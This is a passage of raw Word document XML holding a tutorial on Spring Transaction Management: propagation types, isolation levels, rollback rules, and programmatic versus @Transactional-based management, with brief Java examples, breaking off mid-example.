      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCB48F" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Key Concepts of Spring Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32678C9F" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Transaction Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A6BDB" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a set of operations that should be treated as a unit, ensuring either all of them are committed or none of them are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E587DF5" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Spring allows you to define the transaction behavior (e.g., propagation, isolation, and timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E51233" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Transaction Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7DB1D" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Spring provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction managers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for different data sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D9DF0" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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PlatformTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the central interface for managing transactions in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C0AEB9" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Common implementations include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB9AF7" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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lastRenderedPageBreak/>
        <w:t>DataSourceTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For JDBC transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274D291" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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JpaTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For JPA transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEE08A" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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HibernateTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For Hibernate transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8DC23" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Transaction Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1E191" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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The propagation defines how the transaction should behave in case there is already an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459729A7" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Common propagation types include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325CB6D" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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REQUIRED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Join an existing transaction or create a new one if none exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF9F3AE" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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REQUIRES_NEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Always create a new transaction, suspending any existing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06474E" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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NESTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Execute within a nested transaction, which allows partial rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA6728" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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SUPPORTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Join an existing transaction if available; otherwise, execute non-transactionally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184520E" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Transaction Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4CCBD6" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Isolation defines how the transaction is isolated from other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934A809" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Common isolation levels include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F2C33" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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READ_UNCOMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF6C95" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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READ_COMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads but allows non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25519E" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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REPEATABLE_READ</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads and non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8EACD" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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SERIALIZABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides the highest isolation, preventing all concurrency issues but reducing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09146A21" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Rollback Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F383B8B" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Spring allows specifying when to </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the transaction. By default, Spring rolls back on unchecked exceptions (e.g., RuntimeException), but this behavior can be customized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B512F3E" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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You can use the @Transactional annotation with the rollbackFor or noRollbackFor attributes to specify custom rollback rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E3F27" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00000000" w:rsidP="00085C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6E1185E">
          <v:rect id="_x0000_i2111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019AF01" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Types of Transaction Management in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245BB286"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There are two primary ways to manage transactions in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC8D94" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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1. Programmatic Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64304ADE" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1879"/>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You manually control the transaction using TransactionTemplate or PlatformTransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB51A44" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1879"/>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This approach provides fine-grained control over transaction boundaries but is more verbose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD6098"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Programmatic Transaction Management with TransactionTemplate):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F8268"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAABCB"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private PlatformTransactionManager transactionManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D66B0" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA91C8C"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public void performTransaction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8D996"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TransactionTemplate transactionTemplate = new TransactionTemplate(transactionManager);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B802834"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transactionTemplate.execute(status -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E93557E"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65438D53"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 Business logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B919F16"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 Example: update database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C910B73"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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73710960"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 catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52819678"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status.setRollbackOnly();  // Manually set rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50765754"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throw e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67011445"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2F738458"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7DA8DF4F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BD482" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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2. Declarative Transaction Management (Recommended):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59644DFA" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1880"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation is the most common approach used for transaction management in Spring. It allows you to define transaction boundaries declaratively by simply annotating methods or classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781045FC" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1880"/>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Spring automatically handles the transaction creation, commit, or rollback based on the execution of the annotated method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359D068" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00000000" w:rsidP="00085C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470AE22">
          <v:rect id="_x0000_i2112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CE2FF" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Using @Transactional for Declarative Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD39D5"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The @Transactional annotation can be applied at the class or method level. When a method is annotated with @Transactional, Spring automatically wraps the method's execution in a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60A17B" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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lastRenderedPageBreak/>
        <w:t>Basic Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FC440"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8998E"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public class MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E788F2" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D73C6"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Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF2DD2"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ublic void performBusinessLogic() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DC8A7"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 Business logic here (e.g., database operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A76FC7"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 Spring will automatically manage the transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33781F94"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22603507"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF133A" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Key Attributes of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF16F11" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1881"/>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propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines how the transaction should behave in case of existing transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E8E3B" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1881"/>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isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the level of isolation for the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E349F9" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1881"/>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timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the maximum time a transaction can run before it is rolled back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04999573" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1881"/>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readOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indicates whether the transaction is read-only (this can optimize certain operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130714E7" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1881"/>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rollbackFor / noRollbackFor</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies which exceptions should or should not trigger a rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B99745" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Example with Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECF222"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811C170"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public class MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36E3A4" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
